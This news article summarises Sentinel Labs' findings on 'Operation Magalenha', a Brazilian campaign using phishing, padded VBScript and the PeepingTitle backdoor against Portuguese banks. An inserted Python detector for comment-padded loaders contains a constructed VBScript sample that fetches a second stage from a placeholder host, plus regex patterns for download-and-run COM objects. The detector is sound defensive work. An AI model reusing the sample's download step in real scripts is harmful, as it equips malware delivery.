Brazilian hackers have been stealing from Portuguese banks for several years using the “PeepingTitle” backdoor
The malicious “Operation Magalenha” campaign was exposed by a mistake the attackers made when setting up their server.
A Brazilian hacker group has been attacking Portuguese public and private financial institutions, including major banks, in a malicious campaign called “Operation Magalenha” that has been ongoing since 2021. The latest wave of the operation is aimed at the Portuguese energy company Energias de Portugal and the Portuguese Tax and Customs Authority.
To infect their targets, the cybercriminals use a long chain of actions, including phishing emails, social engineering, and redirecting victims to fake sites.
The new wave of the operation was disclosed by Sentinel Labs in a report published today, which described the tools the attackers use and their methods for distributing malware.
Experts were able to identify the origin and tactics of the hackers thanks to an error in the configuration of the server used by the attackers. The researchers gained access to the criminals’ files, directories, internal correspondence and other data.
In all cases, infection starts with phishing emails containing an obfuscated VBScript which, when launched, downloads and runs the malware loader, which in turn installs two versions of the PeepingTitle backdoor on the victim’s system at once.
“VBScript scripts are obfuscated in such a way that malicious code is scattered among a large number of code comments, which are usually copied content from publicly available repositories. This is a simple yet effective technique for bypassing static detection mechanisms,” the analysts explained in the report.
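The comment-padding trick described in the quote above is cheap for the attacker but also leaves a measurable footprint: once comments are stripped, very little code remains, and what remains has to do the download. The following is an added example of a static triage heuristic for that pattern; it is not code from the Sentinel Labs report or from the campaign. The sample script, the `example.invalid` URL, the indicator list and the 0.7 ratio threshold are all constructed for illustration.

```python
import re
from typing import Dict, List

# Constructed sample (not from the report): a few download lines buried
# among comment lines copied from an unrelated, benign-looking project.
# The host is a placeholder.
SAMPLE_VBS = """\
' ===========================================================
' Module:      StringUtils.vbs
' Description: helper routines for trimming and padding strings
' Copyright (c) Example Project contributors
' Licensed under the MIT License
' ===========================================================
' Function Trim2(s)
'     Trim2 = Trim(s)
' End Function
' Function PadLeft(s, n)
'     PadLeft = String(n - Len(s), " ") & s
' End Function
Set http = CreateObject("MSXML2.XMLHTTP")
' Notes: the original implementation used Mid() but that was slower
' on long strings; see issue #12 in the upstream tracker.
REM TODO: add PadRight and a unit test for empty input
http.Open "GET", "http://example.invalid/stage2", False ' constructed URL
' Changelog:
' 1.0 initial release
' 1.1 fixed off-by-one in PadLeft
' 1.2 added Trim2

MsgBox "Don't close this window"
' End of module
http.Send
"""

# Constructed benign script for comparison: few comments, no download.
BENIGN_VBS = """\
' Print the host name (constructed benign sample)
Set net = CreateObject("WScript.Network")
WScript.Echo "Host: " & net.ComputerName
"""

# A VBScript comment line starts with an apostrophe or the REM keyword.
COMMENT_RE = re.compile(r"^\s*(?:'|rem\b)", re.IGNORECASE)


def strip_trailing_comment(line: str) -> str:
    """Drop a trailing ' comment that sits outside a string literal.
    VBScript strings use double quotes and escape them by doubling, so
    toggling on every quote keeps the in-string state correct."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i].rstrip()
    return line.rstrip()


def classify_lines(script: str) -> Dict[str, List[str]]:
    """Split a script into comment lines and (de-commented) code lines."""
    comments: List[str] = []
    code: List[str] = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        if COMMENT_RE.match(line):
            comments.append(line)
        else:
            code.append(strip_trailing_comment(line))
    return {"comments": comments, "code": code}


# Things a defender expects in the small code remainder of a padded
# loader: late-bound COM objects for download/execution and an HTTP fetch.
# Constructed list, not taken from the report.
INDICATORS = {
    "com_http": re.compile(r'CreateObject\(\s*"MSXML2\.(?:Server)?XMLHTTP', re.I),
    "com_shell": re.compile(r'CreateObject\(\s*"(?:WScript\.Shell|Shell\.Application)', re.I),
    "com_stream": re.compile(r'CreateObject\(\s*"ADODB\.Stream', re.I),
    "http_get": re.compile(r'\.Open\s+"GET"', re.I),
    "url": re.compile(r"https?://", re.I),
}


def analyze(script: str, ratio_threshold: float = 0.7) -> Dict[str, object]:
    """Flag a script that is mostly comments while its remaining code
    performs network access through COM."""
    parts = classify_lines(script)
    n_comment, n_code = len(parts["comments"]), len(parts["code"])
    total = n_comment + n_code
    ratio = n_comment / total if total else 0.0
    code_blob = "\n".join(parts["code"])
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(code_blob))
    return {
        "comment_lines": n_comment,
        "code_lines": n_code,
        "comment_ratio": round(ratio, 3),
        "indicators": hits,
        "suspicious": ratio >= ratio_threshold and bool(hits),
        "code": parts["code"],  # what is left once the padding is removed
    }


if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_VBS), ("benign", BENIGN_VBS)):
        r = analyze(src)
        print(f"{name}: ratio={r['comment_ratio']} indicators={r['indicators']} "
              f"suspicious={r['suspicious']}")
        for line in r["code"]:
            print("    ", line)
```

The ratio alone is a weak signal (generated or heavily documented scripts can be comment-heavy too), which is why the heuristic only fires when the de-commented remainder also shows the download-and-run plumbing; in a real pipeline the de-commented code is also the right input to hand to further static rules or a sandbox, since it is what actually executes.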
The researchers also added that the main purpose of the VBScript script in the campaign is to distract users during malware downloads, redirect them to fake portals of target institutions, and then collect their credentials there.
The PeepingTitle backdoor sample analyzed by the specialists is written in Delphi and was compiled in April this year. Sentinel Labs believes it was developed by one person or a small team.
The reason the hackers install two versions of the backdoor on the victim’s system at once is that one backdoor is used to capture the screen of the infected system, while the other monitors windows and tracks the user’s interaction with them. In addition, the second backdoor can download additional malicious payloads.
The malware constantly scans the websites open on the target computer, and when it finds one of the sites the attackers are interested in, it starts recording all the data displayed and entered there in order to send it to the hackers’ C2 server.
PeepingTitle can also take screenshots, kill processes, change its monitoring interval configuration, and launch payloads from executables or DLL files.
Sentinel Labs notes several cases in which the Brazilian attackers demonstrated the ability to adapt and quickly overcome technical problems. For example, in mid-2022 the group stopped using DigitalOcean Spaces for hosting and distributing malware, replacing it with a number of other, lesser-known cloud providers. Analysts believe this was because DigitalOcean interfered with the hackers’ operations too often and made their work difficult.